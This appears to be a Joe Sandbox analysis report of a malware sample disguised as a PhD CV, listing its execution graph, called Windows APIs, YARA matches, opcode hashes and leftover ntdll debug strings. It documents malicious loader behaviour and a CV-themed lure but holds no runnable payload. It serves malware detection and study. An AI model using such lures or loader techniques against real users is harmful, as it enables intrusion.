                                                                                                  execution_graph 88709 424e63 88712 424e7c 88709->88712 88710 424ec4 88717 42e743 88710->88717 88712->88710 88714 424f04 88712->88714 88716 424f09 88712->88716 88715 42e743 RtlFreeHeap 88714->88715 88715->88716 88720 42ca23 88717->88720 88719 424ed4 88721 42ca3d 88720->88721 88722 42ca4e RtlFreeHeap 88721->88722 88722->88719 88723 42f7e3 88724 42f7f3 88723->88724 88725 42f7f9 88723->88725 88728 42e823 88725->88728 88727 42f81f 88731 42c9d3 88728->88731 88730 42e83e 88730->88727 88732 42c9f0 88731->88732 88733 42ca01 RtlAllocateHeap 88732->88733 88733->88730 88767 424ad3 88768 424aef 88767->88768 88769 424b17 88768->88769 88770 424b2b 88768->88770 88771 42c6b3 NtClose 88769->88771 88777 42c6b3 88770->88777 88773 424b20 88771->88773 88774 424b34 88780 42e863 RtlAllocateHeap 88774->88780 88776 424b3f 88778 42c6cd 88777->88778 88779 42c6de NtClose 88778->88779 88779->88774 88780->88776 88781 42bcb3 88782 42bccd 88781->88782 88785 f82d10 LdrInitializeThunk 88782->88785 88783 42bcf5 88785->88783 88734 41a6e3 88735 41a6fb 88734->88735 88737 41a752 88734->88737 88735->88737 88738 41e603 88735->88738 88739 41e629 88738->88739 88743 41e723 88739->88743 88744 42f913 88739->88744 88741 41e6c1 88741->88743 88750 42bd03 88741->88750 88743->88737 88745 42f883 88744->88745 88746 42f8e0 88745->88746 88747 42e823 RtlAllocateHeap 88745->88747 88746->88741 88748 42f8bd 88747->88748 88749 42e743 RtlFreeHeap 88748->88749 88749->88746 88751 42bd20 88750->88751 88754 f82b2a 88751->88754 88752 42bd4c 88752->88743 88755 f82b3f LdrInitializeThunk 88754->88755 88756 f82b31 88754->88756 88755->88752 88756->88752 88757 414283 88758 41429d 88757->88758 88763 417943 88758->88763 88760 4142b8 88761 4142fd 88760->88761 88762 4142ec PostThreadMessageW 88760->88762 88762->88761 88764 417967 88763->88764 88765 4179a3 LdrLoadDll 88764->88765 88766 41796e 88764->88766 88765->88766 88766->88760 88786 41b433 88787 41b477 88786->88787 88788 41b498 88787->88788 88789 42c6b3 NtClose 88787->88789 88789->88788 88790 f82a80 LdrInitializeThunk 88791 418ef8 88792 42c6b3 NtClose 88791->88792 88793 418f02 88792->88793 88794 401a3e 88795 401a4a 88794->88795 88798 42fcb3 88795->88798 88801 42e303 88798->88801 88802 42e329 88801->88802 88813 407503 88802->88813 88804 42e33f 88812 401a83 88804->88812 88816 41b243 88804->88816 88806 42e373 88827 428383 88806->88827 88807 42e35e 88807->88806 88831 42ca73 88807->88831 88810 42e38d 88811 42ca73 ExitProcess 88810->88811 88811->88812 88815 407510 88813->88815 88834 416673 88813->88834 88815->88804 88817 41b26f 88816->88817 88845 41b133 88817->88845 88820 41b2b4 88823 41b2d0 88820->88823 88825 42c6b3 NtClose 88820->88825 88821 41b29c 88822 41b2a7 88821->88822 88824 42c6b3 NtClose 88821->88824 88822->88807 88823->88807 88824->88822 88826 41b2c6 88825->88826 88826->88807 88828 4283e5 88827->88828 88830 4283f2 88828->88830 88856 4187b3 88828->88856 88830->88810 88832 42ca8d 88831->88832 88833 42ca9e ExitProcess 88832->88833 88833->88806 88835 41668d 88834->88835 88837 4166a6 88835->88837 88838 42d103 88835->88838 88837->88815 88840 42d11d 88838->88840 88839 42d14c 88839->88837 88840->88839 88841 42bd03 LdrInitializeThunk 88840->88841 88842 42d1a9 88841->88842 88843 42e743 RtlFreeHeap 88842->88843 88844 42d1c2 88843->88844 88844->88837 88846 41b14d 88845->88846 88850 41b229 88845->88850 88851 42bda3 88846->88851 88849 42c6b3 NtClose 88849->88850 88850->88820 88850->88821 88852 42bdc0 88851->88852 88855 f834e0 LdrInitializeThunk 88852->88855 88853 41b21d 88853->88849 88855->88853 88858 4187dd 88856->88858 88857 418cdb 88857->88830 88858->88857 88864 413f03 88858->88864 88860 418904 88860->88857 88861 42e743 RtlFreeHeap 88860->88861 88862 41891c 88861->88862 88862->88857 88863 42ca73 ExitProcess 88862->88863 88863->88857 88868 413f20 88864->88868 88866 413f7c 88866->88860 88867 413f86 88867->88860 88868->88867 88869 41b553 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 88868->88869 88869->88866 88870 413d7e 88871 413d24 88870->88871 88872 413d8c 88870->88872 88875 42c943 88871->88875 88876 42c960 88875->88876 88879 f82b90 LdrInitializeThunk 88876->88879 88877 413d45 88879->88877

                                                                                                  Executed Functions

                                                                                                  Function 00417943 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 96 417943-41796c call 42f323 99 417972-417980 call 42f923 96->99 100 41796e-417971 96->100 103 417990-4179a1 call 42ddd3 99->103 104 417982-41798d call 42fbc3 99->104 109 4179a3-4179b7 LdrLoadDll 103->109 110 4179ba-4179bd 103->110 104->103 109->110
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: e4d18d39c10e45269c54ae3f733766b5f2b84eb243d2e6b2cec40681c89af818
                                                                                                  • Instruction ID: 96887e63ba784dfb40f8d98d55b2b47c11ab1a09e34f58f00e4e1dbd3495acc5
                                                                                                  • Opcode Fuzzy Hash: e4d18d39c10e45269c54ae3f733766b5f2b84eb243d2e6b2cec40681c89af818
                                                                                                  • Instruction Fuzzy Hash: 290171B2E1020DBBEF10DBE5DC42FDEB3789B14308F4041AAE90897241F634EB488B95
                                                                                                  Function 0042C6B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 121 42c6b3-42c6ec call 404813 call 42d8f3 NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C6E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 3dcf45a7d347465207fda5b43bd8a9fe00fc1fbb262f8247ff528aa46bd189d6
                                                                                                  • Instruction ID: e6410cab36a0c7c7fd9dc2dfc86f7f5c7eb0271b929d4f746554d809ca9616ab
                                                                                                  • Opcode Fuzzy Hash: 3dcf45a7d347465207fda5b43bd8a9fe00fc1fbb262f8247ff528aa46bd189d6
                                                                                                  • Instruction Fuzzy Hash: 9BE04F366002547BD620BA5ADC41FD7775CDBC9724F40441AFA1867142D7B5B90187B4
                                                                                                  Function 00F82A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 135 f82a80-f82a8c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5ced82a916367c46ec4456de6de007fd476c79faa29f5b4db0f6029657587ee9
                                                                                                  • Instruction ID: da6349f49f93ed291e38d6ac908e9edc62cd809938f85899f3c2347a07ec35f4
                                                                                                  • Opcode Fuzzy Hash: 5ced82a916367c46ec4456de6de007fd476c79faa29f5b4db0f6029657587ee9
                                                                                                  • Instruction Fuzzy Hash: F6900261212000035A0571584514616400A87E2341B91C475E1008590EC93688927135
                                                                                                  Function 00F82B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 136 f82b90-f82b9c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 245abb3ffd99de84141f753ac75b29bde2c0efcbbd76afe2a0befef01953dac4
                                                                                                  • Instruction ID: e9f5c163a24c64cf0a2d35dfd41aedad5423a79f9a470846e19a04b3541cc6c3
                                                                                                  • Opcode Fuzzy Hash: 245abb3ffd99de84141f753ac75b29bde2c0efcbbd76afe2a0befef01953dac4
                                                                                                  • Instruction Fuzzy Hash: D590023121108802EA106158850474A000587D2341F95C865A4418658ECAA688927131
                                                                                                  Function 00F82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 137 f82d10-f82d1c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 996f7004f086ea7727fe76cc41b824a94cfaea5dbdab4bdbc83fcbecca0ffa73
                                                                                                  • Instruction ID: 24471125e20665f1902bd0041d1f25c18f99d14f0361bd7b4efaf2024a95c476
                                                                                                  • Opcode Fuzzy Hash: 996f7004f086ea7727fe76cc41b824a94cfaea5dbdab4bdbc83fcbecca0ffa73
                                                                                                  • Instruction Fuzzy Hash: 0890023121100413EA1161584604707000987D2381FD1C866A0418558EDA678953B131
                                                                                                  Function 00F834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 138 f834e0-f834ec LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9c9093f41fc8830f44c5cda8bc472b12980b28cf8dea8aa6a7b660cd6db54381
                                                                                                  • Instruction ID: b4ef750a29fa0476dddf8c608dec2f62a881d2fd9bd693364fed988512ac89f5
                                                                                                  • Opcode Fuzzy Hash: 9c9093f41fc8830f44c5cda8bc472b12980b28cf8dea8aa6a7b660cd6db54381
                                                                                                  • Instruction Fuzzy Hash: 9190023161510402EA0061584614706100587D2341FA1C865A0418568ECBA6895275B2
                                                                                                  Function 004140D3 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 212COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 4140d3-4140eb 1 414110-414112 0->1 2 4140ee-4140f0 0->2 3 414114-414120 1->3 4 41412f-414138 1->4 2->1 5 4141a2 4->5 6 41413a-414142 4->6 9 4141a4 5->9 7 414144-414163 6->7 8 4140cd-4140d0 6->8 10 414125-414129 7->10 11 414165-414170 7->11 12 41408a-41409f call 413c93 8->12 13 4141a6-4141d2 9->13 10->9 14 41412b-41412c 10->14 15 414175-414180 11->15 27 4140a1-4140b6 call 413d23 12->27 28 414023-41405d call 42e793 call 42eda3 call 424f23 12->28 17 4141f4 13->17 18 4141d4-4141d5 13->18 14->13 19 41412e 14->19 21 414182-414184 15->21 22 414185 15->22 20 4141f5-41422f 17->20 18->20 24 4141d7-4141ee 18->24 19->4 25 414231-414236 20->25 26 414239-41423c 20->26 21->22 22->5 24->15 29 4141f1-4141f3 24->29 25->26 30 4142b3-4142ea call 417943 call 404783 call 424f83 26->30 31 41423e-41424c 26->31 28->12 46 41405f-414065 28->46 29->17 50 41430a-414310 30->50 51 4142ec-4142fb PostThreadMessageW 30->51 48 4140b7-4140ba 46->48 49 414067-414088 call 428543 46->49 48->12 54 4140bc-4140c7 48->54 49->12 49->27 51->50 53 4142fd-414307 51->53 53->50 54->8 55 4140c8 call 42a003 54->55 55->8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 0-2425402595
                                                                                                  • Opcode ID: c48c2feafe291014755796eeafdbb268d9b02a2fea41ff16aa6de71b3fe2eff8
                                                                                                  • Instruction ID: 690b796640c1358c577dd17796f808cdef08065aa7102ce418cd60b6db824699
                                                                                                  • Opcode Fuzzy Hash: c48c2feafe291014755796eeafdbb268d9b02a2fea41ff16aa6de71b3fe2eff8
                                                                                                  • Instruction Fuzzy Hash: 59510333A042147FD712DA75AC46AEEB778EFE2764B14025FEC458B102E63489878BD9
                                                                                                  Function 0041427C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 004142F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595
                                                                                                  • Opcode ID: f344ff08b9dcfd3280fde60bd168106087983ba8dba4e7f154cf37715cb59bcd
                                                                                                  • Instruction ID: c3126c3f79c7f94d7d4b882ab5c7410bb0d6345da22d187f994d5a57981f5041
                                                                                                  • Opcode Fuzzy Hash: f344ff08b9dcfd3280fde60bd168106087983ba8dba4e7f154cf37715cb59bcd
                                                                                                  • Instruction Fuzzy Hash: AF01C8B2E0015C7AEB11AAE59C81DEF7B7CDF917A4F048169F910B7140D6788E068BA1
                                                                                                  Function 00414283 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 72 414283-414295 73 41429d-4142ea call 42f1f3 call 417943 call 404783 call 424f83 72->73 74 414298 call 42e7e3 72->74 84 41430a-414310 73->84 85 4142ec-4142fb PostThreadMessageW 73->85 74->73 85->84 86 4142fd-414307 85->86 86->84
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 004142F7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595
                                                                                                  • Opcode ID: 47f33a4a534b09d0f7a03d0deab64f9d5d151280a4a199fac7c500233520ba0e
                                                                                                  • Instruction ID: 26a8762eeb6ab5948671cf0ac514c71e533b05a7e6f2c1421d7fc69d5c158867
                                                                                                  • Opcode Fuzzy Hash: 47f33a4a534b09d0f7a03d0deab64f9d5d151280a4a199fac7c500233520ba0e
                                                                                                  • Instruction Fuzzy Hash: 1E01D6B1E0021C7AEB11AAE59C81DEF7B7CDF81798F448169FE1077140D6788E068BA5
                                                                                                  Function 0042C9D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 111 42c9d3-42ca17 call 404813 call 42d8f3 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E6C1,?,?,00000000,?,0041E6C1,?,?,?), ref: 0042CA12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 53460c4f2eaba0125bc6c5a4ca4ac02d6cdb0e6bef2478e89afa955253187785
                                                                                                  • Instruction ID: 49c684c96280782addf73825d4d5bba2c50bae8a7c823a38fd5ef9dd9c695a72
                                                                                                  • Opcode Fuzzy Hash: 53460c4f2eaba0125bc6c5a4ca4ac02d6cdb0e6bef2478e89afa955253187785
                                                                                                  • Instruction Fuzzy Hash: 09E06D726002447BD614EF99EC45F9B37ACEFC9714F00841AFA08A7281D674B91087B8
                                                                                                  Function 0042CA23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 116 42ca23-42ca64 call 404813 call 42d8f3 RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,89C3D2E1,00000007,00000000,00000004,00000000,0041722F,000000F4), ref: 0042CA5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: bfb6145444b6225af2390b6e4a4cbb167667cfc20b6587a7338d8edbf369b45c
                                                                                                  • Instruction ID: bdd46f2b3468c26108b006255b83cd4346528b1ee50eef437f0645c5fa6e2e0a
                                                                                                  • Opcode Fuzzy Hash: bfb6145444b6225af2390b6e4a4cbb167667cfc20b6587a7338d8edbf369b45c
                                                                                                  • Instruction Fuzzy Hash: 96E06D76700254BBD624EE99DC41F9B73ACEFC9714F404419FA08A7242C774B91186B4
                                                                                                  Function 0042CA73 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 126 42ca73-42caac call 404813 call 42d8f3 ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,FD3F25B5,?,?,FD3F25B5), ref: 0042CAA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 0878197185bb9dbefd1fcf765f616c4d5c79ffc768311d06d8e2458a51cba307
                                                                                                  • Instruction ID: 7016aa5ed4605e1accbf6bc8fd460d7ab0bc55e5df45dae85ec9a3f35878a549
                                                                                                  • Opcode Fuzzy Hash: 0878197185bb9dbefd1fcf765f616c4d5c79ffc768311d06d8e2458a51cba307
                                                                                                  • Instruction Fuzzy Hash: 37E08676A002147BD620FA9ADC01FD7775CDFC5B64F40841AFA08A7142C6757A11C7F4
                                                                                                  Function 00F82B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 131 f82b2a-f82b2f 132 f82b3f-f82b46 LdrInitializeThunk 131->132 133 f82b31-f82b38 131->133
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3c7b0167818b3fe584df6f064d057464676f9d3706d94055b89a53ae154075d7
                                                                                                  • Instruction ID: 5f43f689e8b502edf55abdba2befd82b2f8f10141b295aae43cd29d625a7dd3a
                                                                                                  • Opcode Fuzzy Hash: 3c7b0167818b3fe584df6f064d057464676f9d3706d94055b89a53ae154075d7
                                                                                                  • Instruction Fuzzy Hash: 0DB02B31C020C0C5EF00E720070C7073A0067D1300F11C061D1020240F8739C081F231

                                                                                                  Non-executed Functions

                                                                                                  Function 00FF8890 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FF8B6F
                                                                                                  • The instruction at %p referenced memory at %p., xrefs: 00FF8A62
                                                                                                  • write to, xrefs: 00FF8AD6
                                                                                                  • *** enter .cxr %p for the context, xrefs: 00FF8B3D
                                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FF8AB4
                                                                                                  • *** Inpage error in %ws:%s, xrefs: 00FF8A48
                                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FF8A06
                                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FF89BF
                                                                                                  • read from, xrefs: 00FF8ADD, 00FF8AE2
                                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FF890C
                                                                                                  • The critical section is owned by thread %p., xrefs: 00FF89E9
                                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FF8AAD
                                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FF8AA6
                                                                                                  • *** then kb to get the faulting stack, xrefs: 00FF8B4C
                                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00FF8923
                                                                                                  • *** enter .exr %p for the exception record, xrefs: 00FF8B21
                                                                                                  • an invalid address, %p, xrefs: 00FF8AFF
                                                                                                  • <unknown>, xrefs: 00FF88AE, 00FF8901, 00FF8980, 00FF89C9, 00FF8A47, 00FF8ABE
                                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FF89CB
                                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 00FF8ABF
                                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FF8944
                                                                                                  • Go determine why that thread has not released the critical section., xrefs: 00FF89F5
                                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FF8953
                                                                                                  • The instruction at %p tried to %s , xrefs: 00FF8AE6
                                                                                                  • The resource is owned shared by %d threads, xrefs: 00FF89AE
                                                                                                  • The resource is owned exclusively by thread %p, xrefs: 00FF89A4
                                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 00FF8982
                                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FF8935
                                                                                                  • This failed because of error %Ix., xrefs: 00FF8A76
                                                                                                  • a NULL pointer, xrefs: 00FF8B10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                  • API String ID: 0-108210295
                                                                                                  • Opcode ID: db1957a04da265dc02c86e47e7864e332de8c932d7b77e71b0de346d014d79d3
                                                                                                  • Instruction ID: 0b721d087aac093f9fbc494bad22c12e3d6aacde00599fb4365bbb8a7248d0a3
                                                                                                  • Opcode Fuzzy Hash: db1957a04da265dc02c86e47e7864e332de8c932d7b77e71b0de346d014d79d3
                                                                                                  • Instruction Fuzzy Hash: FE81F676A40218BFDB259B048C47E7B3B34EF86BB4F00044DF6046B266D769D952FA62
                                                                                                  Function 00F78540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • Critical section address, xrefs: 00FB5230, 00FB52C7, 00FB533F
                                                                                                  • Address of the debug info found in the active list., xrefs: 00FB52B9, 00FB5305
                                                                                                  • Invalid debug info address of this critical section, xrefs: 00FB52C1
                                                                                                  • undeleted critical section in freed memory, xrefs: 00FB5236
                                                                                                  • Critical section address., xrefs: 00FB530D
                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 00FB534E
                                                                                                  • 8, xrefs: 00FB50EE
                                                                                                  • double initialized or corrupted critical section, xrefs: 00FB5313
                                                                                                  • corrupted critical section, xrefs: 00FB52CD
                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB52ED
                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB5215, 00FB52A1, 00FB5324
                                                                                                  • Critical section debug info address, xrefs: 00FB522A, 00FB5339
                                                                                                  • Thread identifier, xrefs: 00FB5345
                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB52D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
